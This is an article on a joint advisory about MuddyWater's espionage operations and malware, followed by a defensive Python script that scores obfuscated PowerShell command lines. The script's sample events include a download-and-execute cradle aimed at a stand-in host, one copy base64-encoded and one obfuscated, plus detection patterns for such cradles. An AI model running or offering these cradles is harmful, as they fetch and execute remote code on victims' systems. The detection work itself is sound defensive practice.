Several U.S. and U.K. cyber and intelligence agencies have just issued a joint Cybersecurity Advisory detailing “malicious cyber operations” by the Iranian state-sponsored hacking group MuddyWater. Organizations have been affected in Asia, Africa, Europe, and North America.
Iranian hackers add to confusion
Iranian government-sponsored “hackers,” or as the advisory calls them, “advanced persistent threat actors,” are “conducting cyber espionage and other malicious cyber operations as part of Iran’s Ministry of Intelligence and Security.” MuddyWater, the advisory says, is “targeting a range of government and private-sector organizations.”
Organizations in several critical sectors, including “telecommunications, defense, local government, and oil and natural gas,” have been hit. This comes on top of the chaos and confusion Russia is trying to cause as a smokescreen for its invasion of Ukraine.
The agencies behind the joint advisory encourage IT and security staff to review the bulletin “Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks.”
They further note that more information is available on CISA’s Iran Cyber Threat Overview and Advisories webpage. The Hacker News fills in some of the gaps. The big danger comes from new and updated malware.
“MuddyWater actors,” they write, “are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.” The group is tracked under several other names by security vendors.
Researchers also know them as “Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.” Whatever the name, the advisory attributes them to the Iranian state.
In support of Iran
The advisory assesses that the group’s cyber offensives are carried out on behalf of the Iranian Ministry of Intelligence and Security.
The advisory’s authors also note that the group has “been historically observed employing open-source tools to gain access to sensitive data, deploy ransomware, and achieve persistence on victim networks.” They are particularly adept at deploying a PowerShell-based backdoor.
By using “obfuscated PowerShell scripts” the Iranian hackers are able to “conceal the most damaging parts of the attacks, including command-and-control functions.” They get in by spearphishing: a seemingly harmless email lures the target into downloading a ZIP archive, and the damage is done once its contents are opened and the embedded macro or payload runs.
The zips “either contain an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious payload to the infected system.”
Once that happens the system is exposed to “multiple malware sets — including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS — for loading malware, backdoor access, persistence, and exfiltration.” That sounds nasty because it is: the group has an extensive toolkit.
“PowGoop functions as a loader responsible for downloading second-stage PowerShell scripts, Small Sieve is described as a Python-based implant used for maintaining foothold in the network by leveraging the Telegram API for C2 communications to evade detection.” If that is not bad enough, Canopy is “a Windows Script File used to collect and transmit system metadata to an adversary-controlled IP address,” and Mori and POWERSTATS are two backdoors “used to run commands received from the C2 and maintain persistent access.”
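The advisory and the write-up above describe obfuscated PowerShell as the layer that hides the command-and-control logic of this chain. The following is an added triage example, not code from the advisory, from The Hacker News, or from any MuddyWater sample: it takes PowerShell command lines (as they would appear in process-creation or script-block logs), decodes any `-EncodedCommand` argument (base64 over UTF-16LE, which is what powershell.exe expects), and scores common obfuscation and download-cradle tells. The three sample events, the 198.51.100.7 address, the indicator list and the score thresholds are all constructed for illustration and are not indicators from the advisory.

```python
import base64
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# powershell.exe accepts abbreviated switches, so -e, -ec, -enc and -EncodedCommand
# all introduce the same base64 blob. The blob must be at least 16 base64 chars.
ENCODED_SWITCH = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# (name, pattern, weight): heuristic tells applied to the raw event and, when
# present, to the decoded -EncodedCommand text. Weights are assumptions.
INDICATORS = [
    ("invoke-expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("download-cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer", re.I), 3),
    ("base64-decode", re.compile(r"frombase64string", re.I), 2),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no-profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("bypass-policy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    # Three or more [char]NN values joined with + is a classic way to spell IEX without writing it.
    ("char-code-concat", re.compile(r"(?:\[char\]\s*\d+\s*\+\s*){2,}\[char\]\s*\d+", re.I), 3),
    # $s[-1..-($s.Length)] reverses a string that was stored backwards.
    ("index-reversal", re.compile(r"\[\s*-1\s*\.\.\s*-"), 2),
    ("compression", re.compile(r"(?:gzip|deflate)stream", re.I), 2),
]
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/=]{40,}")


@dataclass
class Finding:
    event: str
    decoded: Optional[str]      # text recovered from -EncodedCommand, if any
    indicators: list            # names of INDICATORS that fired
    score: int
    max_blob_entropy: float     # Shannon entropy (bits/char) of the longest base64-looking token
    verdict: str


def encode_command(script: str) -> str:
    """Build the value powershell.exe expects after -EncodedCommand (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(event: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_SWITCH.search(event)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def triage(event: str) -> Finding:
    """Score one PowerShell command line; decoded payload text is scored as well."""
    decoded = decode_encoded_command(event)
    text = event if decoded is None else event + "\n" + decoded
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if decoded is not None:
        hits.append("encoded-command")
        score += 2
    blobs = BASE64_BLOB.findall(event)
    entropy = max((shannon_entropy(b) for b in blobs), default=0.0)
    # Thresholds are assumptions; tune them against your own baseline of admin activity.
    verdict = "suspicious" if score >= 5 else "review" if score >= 2 else "benign"
    return Finding(event, decoded, hits, score, round(entropy, 2), verdict)


# Constructed sample events (not real telemetry). The second one hides a download
# cradle behind -enc; the third spells IEX and the scheme with char codes and reversal.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -Command Get-Service | Where-Object Status -eq Running",
    "powershell.exe -nop -w hidden -ep bypass -enc " + encode_command(CRADLE),
    "powershell.exe -c \"$i=[char]73+[char]69+[char]88; $h='ptth'; "
    "$u=-join $h[-1..-($h.Length)]; & $i ($u+'://198.51.100.7/b')\"",
]


def triage_events(events):
    return [triage(e) for e in events]


if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{f.verdict:10} score={f.score:2} {f.indicators}")
        if f.decoded:
            print(f"           decoded: {f.decoded}")
```

Feeding real Security 4688 or Sysmon 1 command lines (or the ScriptBlockText of Event ID 4104) into `triage_events` is the intended use; the third sample is the reason keyword matching alone is not enough, since neither `IEX` nor `http` appears in the raw command line, yet the structural tells still fire.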